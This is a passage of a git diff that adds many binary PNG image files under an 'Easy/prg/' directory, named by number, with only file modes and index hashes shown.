diff --git a/Easy/prg/53_007.png b/Easy/prg/53_007.png
new file mode 100644
index 0000000..76038e9
Binary files /dev/null and b/Easy/prg/53_007.png differ
diff --git a/Easy/prg/53_008.png b/Easy/prg/53_008.png
new file mode 100644
index 0000000..8274358
Binary files /dev/null and b/Easy/prg/53_008.png differ
diff --git a/Easy/prg/53_009.png b/Easy/prg/53_009.png
new file mode 100644
index 0000000..65aa025
Binary files /dev/null and b/Easy/prg/53_009.png differ
diff --git a/Easy/prg/53_010.png b/Easy/prg/53_010.png
new file mode 100644
index 0000000..76c3ab4
Binary files /dev/null and b/Easy/prg/53_010.png differ
diff --git a/Easy/prg/53_011.png b/Easy/prg/53_011.png
new file mode 100644
index 0000000..2fc5bc9
Binary files /dev/null and b/Easy/prg/53_011.png differ
diff --git a/Easy/prg/53_012.png b/Easy/prg/53_012.png
new file mode 100644
index 0000000..e0550ad
Binary files /dev/null and b/Easy/prg/53_012.png differ
diff --git a/Easy/prg/53_013.png b/Easy/prg/53_013.png
new file mode 100644
index 0000000..c088f94
Binary files /dev/null and b/Easy/prg/53_013.png differ
diff --git a/Easy/prg/53_014.png b/Easy/prg/53_014.png
new file mode 100644
index 0000000..4f600ff
Binary files /dev/null and b/Easy/prg/53_014.png differ
diff --git a/Easy/prg/53_015.png b/Easy/prg/53_015.png
new file mode 100644
index 0000000..df398fd
Binary files /dev/null and b/Easy/prg/53_015.png differ
diff --git a/Easy/prg/53_016.png b/Easy/prg/53_016.png
new file mode 100644
index 0000000..666485c
Binary files /dev/null and b/Easy/prg/53_016.png differ
diff --git a/Easy/prg/53_017.png b/Easy/prg/53_017.png
new file mode 100644
index 0000000..0e6b7c2
Binary files /dev/null and b/Easy/prg/53_017.png differ
diff --git a/Easy/prg/53_018.png b/Easy/prg/53_018.png
new file mode 100644
index 0000000..7ace34c
Binary files /dev/null and b/Easy/prg/53_018.png differ
diff --git a/Easy/prg/53_019.png b/Easy/prg/53_019.png
new file mode 100644
index 0000000..19dad25
Binary files /dev/null and b/Easy/prg/53_019.png differ
diff --git a/Easy/prg/54_001.png b/Easy/prg/54_001.png
new file mode 100644
index 0000000..62a98ec
Binary files /dev/null and b/Easy/prg/54_001.png differ
diff --git a/Easy/prg/54_002.png b/Easy/prg/54_002.png
new file mode 100644
index 0000000..9d572e8
Binary files /dev/null and b/Easy/prg/54_002.png differ
diff --git a/Easy/prg/54_003.png b/Easy/prg/54_003.png
new file mode 100644
index 0000000..98bacec
Binary files /dev/null and b/Easy/prg/54_003.png differ
diff --git a/Easy/prg/54_004.png b/Easy/prg/54_004.png
new file mode 100644
index 0000000..cabd8e7
Binary files /dev/null and b/Easy/prg/54_004.png differ
diff --git a/Easy/prg/54_005.png b/Easy/prg/54_005.png
new file mode 100644
index 0000000..d0fa59b
Binary files /dev/null and b/Easy/prg/54_005.png differ
diff --git a/Easy/prg/54_006.png b/Easy/prg/54_006.png
new file mode 100644
index 0000000..e1eff3e
Binary files /dev/null and b/Easy/prg/54_006.png differ
diff --git a/Easy/prg/54_007.png b/Easy/prg/54_007.png
new file mode 100644
index 0000000..a7625ff
Binary files /dev/null and b/Easy/prg/54_007.png differ
diff --git a/Easy/prg/54_008.png b/Easy/prg/54_008.png
new file mode 100644
index 0000000..50225d8
Binary files /dev/null and b/Easy/prg/54_008.png differ
diff --git a/Easy/prg/54_009.png b/Easy/prg/54_009.png
new file mode 100644
index 0000000..368957e
Binary files /dev/null and b/Easy/prg/54_009.png differ
diff --git a/Easy/prg/54_010.png b/Easy/prg/54_010.png
new file mode 100644
index 0000000..8aece01
Binary files /dev/null and b/Easy/prg/54_010.png differ
diff --git a/Easy/prg/54_011.png b/Easy/prg/54_011.png
new file mode 100644
index 0000000..6e4931d
Binary files /dev/null and b/Easy/prg/54_011.png differ
diff --git a/Easy/prg/54_012.png b/Easy/prg/54_012.png
new file mode 100644
index 0000000..0ea7b23
Binary files /dev/null and b/Easy/prg/54_012.png differ
diff --git a/Easy/prg/54_013.png b/Easy/prg/54_013.png
new file mode 100644
index 0000000..8d0bda4
Binary files /dev/null and b/Easy/prg/54_013.png differ
diff --git a/Easy/prg/54_014.png b/Easy/prg/54_014.png
new file mode 100644
index 0000000..6e857fa
Binary files /dev/null and b/Easy/prg/54_014.png differ
diff --git a/Easy/prg/54_015.png b/Easy/prg/54_015.png
new file mode 100644
index 0000000..7afadd6
Binary files /dev/null and b/Easy/prg/54_015.png differ
diff --git a/Easy/prg/54_016.png b/Easy/prg/54_016.png
new file mode 100644
index 0000000..d3d7d70
Binary files /dev/null and b/Easy/prg/54_016.png differ
diff --git a/Easy/prg/54_017.png b/Easy/prg/54_017.png
new file mode 100644
index 0000000..a00794d
Binary files /dev/null and b/Easy/prg/54_017.png differ
diff --git a/Easy/prg/54_018.png b/Easy/prg/54_018.png
new file mode 100644
index 0000000..4b45366
Binary files /dev/null and b/Easy/prg/54_018.png differ
diff --git a/Easy/prg/54_019.png b/Easy/prg/54_019.png
new file mode 100644
index 0000000..224b320
Binary files /dev/null and b/Easy/prg/54_019.png differ
diff --git a/Easy/prg/55_001.png b/Easy/prg/55_001.png
new file mode 100644
index 0000000..a318676
Binary files /dev/null and b/Easy/prg/55_001.png differ
diff --git a/Easy/prg/55_002.png b/Easy/prg/55_002.png
new file mode 100644
index 0000000..c2acf67
Binary files /dev/null and b/Easy/prg/55_002.png differ
diff --git a/Easy/prg/55_003.png b/Easy/prg/55_003.png
new file mode 100644
index 0000000..1f58e54
Binary files /dev/null and b/Easy/prg/55_003.png differ
diff --git a/Easy/prg/55_004.png b/Easy/prg/55_004.png
new file mode 100644
index 0000000..58cdee4
Binary files /dev/null and b/Easy/prg/55_004.png differ
diff --git a/Easy/prg/55_005.png b/Easy/prg/55_005.png
new file mode 100644
index 0000000..bb02a4e
Binary files /dev/null and b/Easy/prg/55_005.png differ
diff --git a/Easy/prg/55_006.png b/Easy/prg/55_006.png
new file mode 100644
index 0000000..34f5a16
Binary files /dev/null and b/Easy/prg/55_006.png differ
diff --git a/Easy/prg/55_007.png b/Easy/prg/55_007.png
new file mode 100644
index 0000000..79a67f8
Binary files /dev/null and b/Easy/prg/55_007.png differ
diff --git a/Easy/prg/55_008.png b/Easy/prg/55_008.png
new file mode 100644
index 0000000..c4cf7c1
Binary files /dev/null and b/Easy/prg/55_008.png differ
diff --git a/Easy/prg/55_009.png b/Easy/prg/55_009.png
new file mode 100644
index 0000000..0df0c8c
Binary files /dev/null and b/Easy/prg/55_009.png differ
diff --git a/Easy/prg/55_010.png b/Easy/prg/55_010.png
new file mode 100644
index 0000000..8522a73
Binary files /dev/null and b/Easy/prg/55_010.png differ
diff --git a/Easy/prg/55_011.png b/Easy/prg/55_011.png
new file mode 100644
index 0000000..fd3eec5
Binary files /dev/null and b/Easy/prg/55_011.png differ
diff --git a/Easy/prg/55_012.png b/Easy/prg/55_012.png
new file mode 100644
index 0000000..6033377
Binary files /dev/null and b/Easy/prg/55_012.png differ
diff --git a/Easy/prg/55_013.png b/Easy/prg/55_013.png
new file mode 100644
index 0000000..19f007a
Binary files /dev/null and b/Easy/prg/55_013.png differ
diff --git a/Easy/prg/55_014.png b/Easy/prg/55_014.png
new file mode 100644
index 0000000..04df48d
Binary files /dev/null and b/Easy/prg/55_014.png differ
diff --git a/Easy/prg/55_015.png b/Easy/prg/55_015.png
new file mode 100644
index 0000000..b006f83
Binary files /dev/null and b/Easy/prg/55_015.png differ
diff --git a/Easy/prg/55_016.png b/Easy/prg/55_016.png
new file mode 100644
index 0000000..0f2ddb7
Binary files /dev/null and b/Easy/prg/55_016.png differ
diff --git a/Easy/prg/55_017.png b/Easy/prg/55_017.png
new file mode 100644
index 0000000..e349e73
Binary files /dev/null and b/Easy/prg/55_017.png differ
diff --git a/Easy/prg/56_001.png b/Easy/prg/56_001.png
new file mode 100644
index 0000000..704250f
Binary files /dev/null and b/Easy/prg/56_001.png differ
diff --git a/Easy/prg/56_002.png b/Easy/prg/56_002.png
new file mode 100644
index 0000000..6e6ce07
Binary files /dev/null and b/Easy/prg/56_002.png differ
diff --git a/Easy/prg/56_003.png b/Easy/prg/56_003.png
new file mode 100644
index 0000000..1ac7272
Binary files /dev/null and b/Easy/prg/56_003.png differ
diff --git a/Easy/prg/56_004.png b/Easy/prg/56_004.png
new file mode 100644
index 0000000..56c6517
Binary files /dev/null and b/Easy/prg/56_004.png differ
diff --git a/Easy/prg/56_005.png b/Easy/prg/56_005.png
new file mode 100644
index 0000000..c1f7120
Binary files /dev/null and b/Easy/prg/56_005.png differ
diff --git a/Easy/prg/56_006.png b/Easy/prg/56_006.png
new file mode 100644
index 0000000..8b45fc2
Binary files /dev/null and b/Easy/prg/56_006.png differ
diff --git a/Easy/prg/57_001.png b/Easy/prg/57_001.png
new file mode 100644
index 0000000..9a1ffc3
Binary files /dev/null and b/Easy/prg/57_001.png differ
diff --git a/Easy/prg/57_002.png b/Easy/prg/57_002.png
new file mode 100644
index 0000000..b609c3d
Binary files /dev/null and b/Easy/prg/57_002.png differ
diff --git a/Easy/prg/57_003.png b/Easy/prg/57_003.png
new file mode 100644
index 0000000..9620b36
Binary files /dev/null and b/Easy/prg/57_003.png differ
diff --git a/Easy/prg/57_004.png b/Easy/prg/57_004.png
new file mode 100644
index 0000000..357e043
Binary files /dev/null and b/Easy/prg/57_004.png differ
diff --git a/Easy/prg/58_001.png b/Easy/prg/58_001.png
new file mode 100644
index 0000000..1918881
Binary files /dev/null and b/Easy/prg/58_001.png differ
diff --git a/Easy/prg/58_002.png b/Easy/prg/58_002.png
new file mode 100644
index 0000000..9f3b96b
Binary files /dev/null and b/Easy/prg/58_002.png differ
diff --git a/Easy/prg/58_003.png b/Easy/prg/58_003.png
new file mode 100644
index 0000000..10eeb7b
Binary files /dev/null and b/Easy/prg/58_003.png differ
diff --git a/Easy/prg/58_004.png b/Easy/prg/58_004.png
new file mode 100644
index 0000000..81954f7
Binary files /dev/null and b/Easy/prg/58_004.png differ
diff --git a/Easy/prg/58_005.png b/Easy/prg/58_005.png
new file mode 100644
index 0000000..bbee00e
Binary files /dev/null and b/Easy/prg/58_005.png differ
diff --git a/Easy/prg/58_006.png b/Easy/prg/58_006.png
new file mode 100644
index 0000000..b7a9564
Binary files /dev/null and b/Easy/prg/58_006.png differ
diff --git a/Easy/prg/58_007.png b/Easy/prg/58_007.png
new file mode 100644
index 0000000..55a7537
Binary files /dev/null and b/Easy/prg/58_007.png differ
diff --git a/Easy/prg/59_001.png b/Easy/prg/59_001.png
new file mode 100644
index 0000000..7537016
Binary files /dev/null and b/Easy/prg/59_001.png differ
diff --git a/Easy/prg/59_002.png b/Easy/prg/59_002.png
new file mode 100644
index 0000000..74cc148
Binary files /dev/null and b/Easy/prg/59_002.png differ
diff --git a/Easy/prg/59_003.png b/Easy/prg/59_003.png
new file mode 100644
index 0000000..ea087c7
Binary files /dev/null and b/Easy/prg/59_003.png differ
diff --git a/Easy/prg/59_004.png b/Easy/prg/59_004.png
new file mode 100644
index 0000000..cb29c23
Binary files /dev/null and b/Easy/prg/59_004.png differ
diff --git a/Easy/prg/59_005.png b/Easy/prg/59_005.png
new file mode 100644
index 0000000..5cf9d3b
Binary files /dev/null and b/Easy/prg/59_005.png differ
diff --git a/Easy/prg/59_006.png b/Easy/prg/59_006.png
new file mode 100644
index 0000000..ca45304
Binary files /dev/null and b/Easy/prg/59_006.png differ
diff --git a/Easy/prg/5_001.png b/Easy/prg/5_001.png
new file mode 100644
index 0000000..a3712dd
Binary files /dev/null and b/Easy/prg/5_001.png differ
diff --git a/Easy/prg/5_002.png b/Easy/prg/5_002.png
new file mode 100644
index 0000000..f5aab23
Binary files /dev/null and b/Easy/prg/5_002.png differ
diff --git a/Easy/prg/60_001.png b/Easy/prg/60_001.png
new file mode 100644
index 0000000..fe8c8e1
Binary files /dev/null and b/Easy/prg/60_001.png differ
diff --git a/Easy/prg/60_002.png b/Easy/prg/60_002.png
new file mode 100644
index 0000000..8831b8b
Binary files /dev/null and b/Easy/prg/60_002.png differ
diff --git a/Easy/prg/60_003.png b/Easy/prg/60_003.png
new file mode 100644
index 0000000..3d7b471
Binary files /dev/null and b/Easy/prg/60_003.png differ
diff --git a/Easy/prg/60_004.png b/Easy/prg/60_004.png
new file mode 100644
index 0000000..df41cb1
Binary files /dev/null and b/Easy/prg/60_004.png differ
diff --git a/Easy/prg/60_005.png b/Easy/prg/60_005.png
new file mode 100644
index 0000000..aa150c9
Binary files /dev/null and b/Easy/prg/60_005.png differ
diff --git a/Easy/prg/60_006.png b/Easy/prg/60_006.png
new file mode 100644
index 0000000..8f210f0
Binary files /dev/null and b/Easy/prg/60_006.png differ
diff --git a/Easy/prg/60_007.png b/Easy/prg/60_007.png
new file mode 100644
index 0000000..09510a6
Binary files /dev/null and b/Easy/prg/60_007.png differ
diff --git a/Easy/prg/60_008.png b/Easy/prg/60_008.png
new file mode 100644
index 0000000..71d3e30
Binary files /dev/null and b/Easy/prg/60_008.png differ
diff --git a/Easy/prg/60_009.png b/Easy/prg/60_009.png
new file mode 100644
index 0000000..1ae7fef
Binary files /dev/null and b/Easy/prg/60_009.png differ
diff --git a/Easy/prg/60_010.png b/Easy/prg/60_010.png
new file mode 100644
index 0000000..8fe97ef
Binary files /dev/null and b/Easy/prg/60_010.png differ
diff --git a/Easy/prg/61_001.png b/Easy/prg/61_001.png
new file mode 100644
index 0000000..88a15cf
Binary files /dev/null and b/Easy/prg/61_001.png differ
diff --git a/Easy/prg/61_002.png b/Easy/prg/61_002.png
new file mode 100644
index 0000000..a0599f4
Binary files /dev/null and b/Easy/prg/61_002.png differ
diff --git a/Easy/prg/61_003.png b/Easy/prg/61_003.png
new file mode 100644
index 0000000..6fac5f3
Binary files /dev/null and b/Easy/prg/61_003.png differ
diff --git a/Easy/prg/61_004.png b/Easy/prg/61_004.png
new file mode 100644
index 0000000..f18fc88
Binary files /dev/null and b/Easy/prg/61_004.png differ
diff --git a/Easy/prg/61_005.png b/Easy/prg/61_005.png
new file mode 100644
index 0000000..31d1527
Binary files /dev/null and b/Easy/prg/61_005.png differ
diff --git a/Easy/prg/61_006.png b/Easy/prg/61_006.png
new file mode 100644
index 0000000..a3a6ccf
Binary files /dev/null and b/Easy/prg/61_006.png differ
diff --git a/Easy/prg/61_007.png b/Easy/prg/61_007.png
new file mode 100644
index 0000000..fa90ad6
Binary files /dev/null and b/Easy/prg/61_007.png differ
diff --git a/Easy/prg/61_008.png b/Easy/prg/61_008.png
new file mode 100644
index 0000000..5af2ce2
Binary files /dev/null and b/Easy/prg/61_008.png differ
diff --git a/Easy/prg/61_009.png b/Easy/prg/61_009.png
new file mode 100644
index 0000000..0cfd3e5
Binary files /dev/null and b/Easy/prg/61_009.png differ
diff --git a/Easy/prg/61_010.png b/Easy/prg/61_010.png
new file mode 100644
index 0000000..ca68577
Binary files /dev/null and b/Easy/prg/61_010.png differ
diff --git a/Easy/prg/61_011.png b/Easy/prg/61_011.png
new file mode 100644
index 0000000..1642b9a
Binary files /dev/null and b/Easy/prg/61_011.png differ
diff --git a/Easy/prg/61_012.png b/Easy/prg/61_012.png
new file mode 100644
index 0000000..b1c55a7
Binary files /dev/null and b/Easy/prg/61_012.png differ
diff --git a/Easy/prg/61_013.png b/Easy/prg/61_013.png
new file mode 100644
index 0000000..e074dc3
Binary files /dev/null and b/Easy/prg/61_013.png differ
diff --git a/Easy/prg/61_014.png b/Easy/prg/61_014.png
new file mode 100644
index 0000000..fb3bb76
Binary files /dev/null and b/Easy/prg/61_014.png differ
diff --git a/Easy/prg/62_001.png b/Easy/prg/62_001.png
new file mode 100644
index 0000000..080738c
Binary files /dev/null and b/Easy/prg/62_001.png differ
diff --git a/Easy/prg/62_002.png b/Easy/prg/62_002.png
new file mode 100644
index 0000000..c48b7f3
Binary files /dev/null and b/Easy/prg/62_002.png differ
diff --git a/Easy/prg/62_003.png b/Easy/prg/62_003.png
new file mode 100644
index 0000000..ea6bfe1
Binary files /dev/null and b/Easy/prg/62_003.png differ
diff --git a/Easy/prg/62_004.png b/Easy/prg/62_004.png
new file mode 100644
index 0000000..856865e
Binary files /dev/null and b/Easy/prg/62_004.png differ
diff --git a/Easy/prg/63_001.png b/Easy/prg/63_001.png
new file mode 100644
index 0000000..93c898f
Binary files /dev/null and b/Easy/prg/63_001.png differ
diff --git a/Easy/prg/63_002.png b/Easy/prg/63_002.png
new file mode 100644
index 0000000..a34e2e0
Binary files /dev/null and b/Easy/prg/63_002.png differ
diff --git a/Easy/prg/63_003.png b/Easy/prg/63_003.png
new file mode 100644
index 0000000..2d101fc
Binary files /dev/null and b/Easy/prg/63_003.png differ
diff --git a/Easy/prg/64_001.png b/Easy/prg/64_001.png
new file mode 100644
index 0000000..8eabea9
Binary files /dev/null and b/Easy/prg/64_001.png differ
diff --git a/Easy/prg/64_002.png b/Easy/prg/64_002.png
new file mode 100644
index 0000000..2e2651e
Binary files /dev/null and b/Easy/prg/64_002.png differ
diff --git a/Easy/prg/64_003.png b/Easy/prg/64_003.png
new file mode 100644
index 0000000..cd7074f
Binary files /dev/null and b/Easy/prg/64_003.png differ
diff --git a/Easy/prg/64_004.png b/Easy/prg/64_004.png
new file mode 100644
index 0000000..35f04a7
Binary files /dev/null and b/Easy/prg/64_004.png differ
diff --git a/Easy/prg/64_005.png b/Easy/prg/64_005.png
new file mode 100644
index 0000000..34d1a24
Binary files /dev/null and b/Easy/prg/64_005.png differ
diff --git a/Easy/prg/64_006.png b/Easy/prg/64_006.png
new file mode 100644
index 0000000..582cf08
Binary files /dev/null and b/Easy/prg/64_006.png differ
diff --git a/Easy/prg/64_007.png b/Easy/prg/64_007.png
new file mode 100644
index 0000000..3444ba9
Binary files /dev/null and b/Easy/prg/64_007.png differ
diff --git a/Easy/prg/64_008.png b/Easy/prg/64_008.png
new file mode 100644
index 0000000..b421d78
Binary files /dev/null and b/Easy/prg/64_008.png differ
diff --git a/Easy/prg/64_009.png b/Easy/prg/64_009.png
new file mode 100644
index 0000000..32a9bef
Binary files /dev/null and b/Easy/prg/64_009.png differ
diff --git a/Easy/prg/64_010.png b/Easy/prg/64_010.png
new file mode 100644
index 0000000..4cfd20f
Binary files /dev/null and b/Easy/prg/64_010.png differ
diff --git a/Easy/prg/64_011.png b/Easy/prg/64_011.png
new file mode 100644
index 0000000..09b99b6
Binary files /dev/null and b/Easy/prg/64_011.png differ
diff --git a/Easy/prg/64_012.png b/Easy/prg/64_012.png
new file mode 100644
index 0000000..7451ed5
Binary files /dev/null and b/Easy/prg/64_012.png differ
diff --git a/Easy/prg/64_013.png b/Easy/prg/64_013.png
new file mode 100644
index 0000000..e816e2a
Binary files /dev/null and b/Easy/prg/64_013.png differ
diff --git a/Easy/prg/64_014.png b/Easy/prg/64_014.png
new file mode 100644
index 0000000..d002db2
Binary files /dev/null and b/Easy/prg/64_014.png differ
diff --git a/Easy/prg/64_015.png b/Easy/prg/64_015.png
new file mode 100644
index 0000000..48c79e2
Binary files /dev/null and b/Easy/prg/64_015.png differ
diff --git a/Easy/prg/64_016.png b/Easy/prg/64_016.png
new file mode 100644
index 0000000..ffa2420
Binary files /dev/null and b/Easy/prg/64_016.png differ
diff --git a/Easy/prg/64_017.png b/Easy/prg/64_017.png
new file mode 100644
index 0000000..643da18
Binary files /dev/null and b/Easy/prg/64_017.png differ
diff --git a/Easy/prg/64_018.png b/Easy/prg/64_018.png
new file mode 100644
index 0000000..a7c3a86
Binary files /dev/null and b/Easy/prg/64_018.png differ
diff --git a/Easy/prg/64_019.png b/Easy/prg/64_019.png
new file mode 100644
index 0000000..f71bc4c
Binary files /dev/null and b/Easy/prg/64_019.png differ
diff --git a/Easy/prg/65_001.png b/Easy/prg/65_001.png
new file mode 100644
index 0000000..f28e465
Binary files /dev/null and b/Easy/prg/65_001.png differ
diff --git a/Easy/prg/65_002.png b/Easy/prg/65_002.png
new file mode 100644
index 0000000..6d64e5a
Binary files /dev/null and b/Easy/prg/65_002.png differ
diff --git a/Easy/prg/65_003.png b/Easy/prg/65_003.png
new file mode 100644
index 0000000..65ce542
Binary files /dev/null and b/Easy/prg/65_003.png differ
diff --git a/Easy/prg/65_004.png b/Easy/prg/65_004.png
new file mode 100644
index 0000000..43b07db
Binary files /dev/null and b/Easy/prg/65_004.png differ
diff --git a/Easy/prg/65_005.png b/Easy/prg/65_005.png
new file mode 100644
index 0000000..dd083a0
Binary files /dev/null and b/Easy/prg/65_005.png differ
diff --git a/Easy/prg/65_006.png b/Easy/prg/65_006.png
new file mode 100644
index 0000000..de715f3
Binary files /dev/null and b/Easy/prg/65_006.png differ
diff --git a/Easy/prg/65_007.png b/Easy/prg/65_007.png
new file mode 100644
index 0000000..b3b6e38
Binary files /dev/null and b/Easy/prg/65_007.png differ
diff --git a/Easy/prg/65_008.png b/Easy/prg/65_008.png
new file mode 100644
index 0000000..3521937
Binary files /dev/null and b/Easy/prg/65_008.png differ
diff --git a/Easy/prg/65_009.png b/Easy/prg/65_009.png
new file mode 100644
index 0000000..534f9a6
Binary files /dev/null and b/Easy/prg/65_009.png differ
diff --git a/Easy/prg/65_010.png b/Easy/prg/65_010.png
new file mode 100644
index 0000000..113f62d
Binary files /dev/null and b/Easy/prg/65_010.png differ
diff --git a/Easy/prg/65_011.png b/Easy/prg/65_011.png
new file mode 100644
index 0000000..965c049
Binary files /dev/null and b/Easy/prg/65_011.png differ
diff --git a/Easy/prg/66_001.png b/Easy/prg/66_001.png
new file mode 100644
index 0000000..5b42699
Binary files /dev/null and b/Easy/prg/66_001.png differ
diff --git a/Easy/prg/66_002.png b/Easy/prg/66_002.png
new file mode 100644
index 0000000..54bae55
Binary files /dev/null and b/Easy/prg/66_002.png differ
diff --git a/Easy/prg/66_003.png b/Easy/prg/66_003.png
new file mode 100644
index 0000000..16c6543
Binary files /dev/null and b/Easy/prg/66_003.png differ
diff --git a/Easy/prg/66_004.png b/Easy/prg/66_004.png
new file mode 100644
index 0000000..ca355e2
Binary files /dev/null and b/Easy/prg/66_004.png differ
diff --git a/Easy/prg/66_005.png b/Easy/prg/66_005.png
new file mode 100644
index 0000000..b6abc50
Binary files /dev/null and b/Easy/prg/66_005.png differ
diff --git a/Easy/prg/66_006.png b/Easy/prg/66_006.png
new file mode 100644
index 0000000..de00aa7
Binary files /dev/null and b/Easy/prg/66_006.png differ
diff --git a/Easy/prg/66_007.png b/Easy/prg/66_007.png
new file mode 100644
index 0000000..1c8b7b8
Binary files /dev/null and b/Easy/prg/66_007.png differ
diff --git a/Easy/prg/66_008.png b/Easy/prg/66_008.png
new file mode 100644
index 0000000..25ca51a
Binary files /dev/null and b/Easy/prg/66_008.png differ
diff --git a/Easy/prg/66_009.png b/Easy/prg/66_009.png
new file mode 100644
index 0000000..9c9f2f5
Binary files /dev/null and b/Easy/prg/66_009.png differ
diff --git a/Easy/prg/67_001.png b/Easy/prg/67_001.png
new file mode 100644
index 0000000..a438d5c
Binary files /dev/null and b/Easy/prg/67_001.png differ
diff --git a/Easy/prg/67_002.png b/Easy/prg/67_002.png
new file mode 100644
index 0000000..325c4b3
Binary files /dev/null and b/Easy/prg/67_002.png differ
diff --git a/Easy/prg/68_001.png b/Easy/prg/68_001.png
new file mode 100644
index 0000000..1107c31
Binary files /dev/null and b/Easy/prg/68_001.png differ
diff --git a/Easy/prg/68_002.png b/Easy/prg/68_002.png
new file mode 100644
index 0000000..1696ac4
Binary files /dev/null and b/Easy/prg/68_002.png differ
diff --git a/Easy/prg/68_003.png b/Easy/prg/68_003.png
new file mode 100644
index 0000000..c31441c
Binary files /dev/null and b/Easy/prg/68_003.png differ
diff --git a/Easy/prg/68_004.png b/Easy/prg/68_004.png
new file mode 100644
index 0000000..6c72894
Binary files /dev/null and b/Easy/prg/68_004.png differ
diff --git a/Easy/prg/68_005.png b/Easy/prg/68_005.png
new file mode 100644
index 0000000..e319863
Binary files /dev/null and b/Easy/prg/68_005.png differ
diff --git a/Easy/prg/68_006.png b/Easy/prg/68_006.png
new file mode 100644
index 0000000..ca305f6
Binary files /dev/null and b/Easy/prg/68_006.png differ
diff --git a/Easy/prg/68_007.png b/Easy/prg/68_007.png
new file mode 100644
index 0000000..6beccb8
Binary files /dev/null and b/Easy/prg/68_007.png differ
diff --git a/Easy/prg/68_008.png b/Easy/prg/68_008.png
new file mode 100644
index 0000000..f5d372b
Binary files /dev/null and b/Easy/prg/68_008.png differ
diff --git a/Easy/prg/68_009.png b/Easy/prg/68_009.png
new file mode 100644
index 0000000..0cd0cfc
Binary files /dev/null and b/Easy/prg/68_009.png differ
diff --git a/Easy/prg/69_001.png b/Easy/prg/69_001.png
new file mode 100644
index 0000000..8ec58ef
Binary files /dev/null and b/Easy/prg/69_001.png differ
diff --git a/Easy/prg/69_002.png b/Easy/prg/69_002.png
new file mode 100644
index 0000000..0c8fd19
Binary files /dev/null and b/Easy/prg/69_002.png differ
diff --git a/Easy/prg/6_001.png b/Easy/prg/6_001.png
new file mode 100644
index 0000000..9d65280
Binary files /dev/null and b/Easy/prg/6_001.png differ
diff --git a/Easy/prg/6_002.png b/Easy/prg/6_002.png
new file mode 100644
index 0000000..b534088
Binary files /dev/null and b/Easy/prg/6_002.png differ
diff --git a/Easy/prg/6_003.png b/Easy/prg/6_003.png
new file mode 100644
index 0000000..a9d5292
Binary files /dev/null and b/Easy/prg/6_003.png differ
diff --git a/Easy/prg/6_004.png b/Easy/prg/6_004.png
new file mode 100644
index 0000000..b420fc8
Binary files /dev/null and b/Easy/prg/6_004.png differ
diff --git a/Easy/prg/6_005.png b/Easy/prg/6_005.png
new file mode 100644
index 0000000..5b465ac
Binary files /dev/null and b/Easy/prg/6_005.png differ
diff --git a/Easy/prg/6_006.png b/Easy/prg/6_006.png
new file mode 100644
index 0000000..1ac2f3e
Binary files /dev/null and b/Easy/prg/6_006.png differ
diff --git a/Easy/prg/6_007.png b/Easy/prg/6_007.png
new file mode 100644
index 0000000..0e69668
Binary files /dev/null and b/Easy/prg/6_007.png differ
diff --git a/Easy/prg/6_008.png b/Easy/prg/6_008.png
new file mode 100644
index 0000000..7e0aafb
Binary files /dev/null and b/Easy/prg/6_008.png differ
diff --git a/Easy/prg/6_009.png b/Easy/prg/6_009.png
new file mode 100644
index 0000000..e5c7d58
Binary files /dev/null and b/Easy/prg/6_009.png differ
diff --git a/Easy/prg/6_010.png b/Easy/prg/6_010.png
new file mode 100644
index 0000000..32972d8
Binary files /dev/null and b/Easy/prg/6_010.png differ
diff --git a/Easy/prg/70_001.png b/Easy/prg/70_001.png
new file mode 100644
index 0000000..44e71cb
Binary files /dev/null and b/Easy/prg/70_001.png differ
diff --git a/Easy/prg/70_002.png b/Easy/prg/70_002.png
new file mode 100644
index 0000000..b41d82c
Binary files /dev/null and b/Easy/prg/70_002.png differ
diff --git a/Easy/prg/70_003.png b/Easy/prg/70_003.png
new file mode 100644
index 0000000..a21519e
Binary files /dev/null and b/Easy/prg/70_003.png differ
diff --git a/Easy/prg/70_004.png b/Easy/prg/70_004.png
new file mode 100644
index 0000000..52d53f4
Binary files /dev/null and b/Easy/prg/70_004.png differ
diff --git a/Easy/prg/70_005.png b/Easy/prg/70_005.png
new file mode 100644
index 0000000..b9f75a2
Binary files /dev/null and b/Easy/prg/70_005.png differ
diff --git a/Easy/prg/70_006.png b/Easy/prg/70_006.png
new file mode 100644
index 0000000..166e206
Binary files /dev/null and b/Easy/prg/70_006.png differ
diff --git a/Easy/prg/71_001.png b/Easy/prg/71_001.png
new file mode 100644
index 0000000..98d608f
Binary files /dev/null and b/Easy/prg/71_001.png differ
diff --git a/Easy/prg/71_002.png b/Easy/prg/71_002.png
new file mode 100644
index 0000000..58c0bfd
Binary files /dev/null and b/Easy/prg/71_002.png differ
diff --git a/Easy/prg/71_003.png b/Easy/prg/71_003.png
new file mode 100644
index 0000000..16ffe12
Binary files /dev/null and b/Easy/prg/71_003.png differ
diff --git a/Easy/prg/71_004.png b/Easy/prg/71_004.png
new file mode 100644
index 0000000..3124477
Binary files /dev/null and b/Easy/prg/71_004.png differ
diff --git a/Easy/prg/71_005.png b/Easy/prg/71_005.png
new file mode 100644
index 0000000..0ccf7e7
Binary files /dev/null and b/Easy/prg/71_005.png differ
diff --git a/Easy/prg/71_006.png b/Easy/prg/71_006.png
new file mode 100644
index 0000000..8312e27
Binary files /dev/null and b/Easy/prg/71_006.png differ
diff --git a/Easy/prg/71_007.png b/Easy/prg/71_007.png
new file mode 100644
index 0000000..d77e179
Binary files /dev/null and b/Easy/prg/71_007.png differ
diff --git a/Easy/prg/9_001.png b/Easy/prg/9_001.png
new file mode 100644
index 0000000..442f999
Binary files /dev/null and b/Easy/prg/9_001.png differ
diff --git a/Easy/prg/9_002.png b/Easy/prg/9_002.png
new file mode 100644
index 0000000..495f79b
Binary files /dev/null and b/Easy/prg/9_002.png differ
diff --git a/Easy/prg/9_003.png b/Easy/prg/9_003.png
new file mode 100644
index 0000000..8410df6
Binary files /dev/null and b/Easy/prg/9_003.png differ
diff --git a/Easy/prg/9_004.png b/Easy/prg/9_004.png
new file mode 100644
index 0000000..1a921a0
Binary files /dev/null and b/Easy/prg/9_004.png differ
diff --git a/Easy/prg/9_005.png b/Easy/prg/9_005.png
new file mode 100644
index 0000000..9a032d9
Binary files /dev/null and b/Easy/prg/9_005.png differ
diff --git a/Easy/prg/9_006.png b/Easy/prg/9_006.png
new file mode 100644
index 0000000..041e5d7
Binary files /dev/null and b/Easy/prg/9_006.png differ
diff --git a/Easy/prg/9_007.png b/Easy/prg/9_007.png
new file mode 100644
index 0000000..32f9cdc
Binary files /dev/null and b/Easy/prg/9_007.png differ
diff --git a/Easy/prg/9_008.png b/Easy/prg/9_008.png
new file mode 100644
index 0000000..682477a
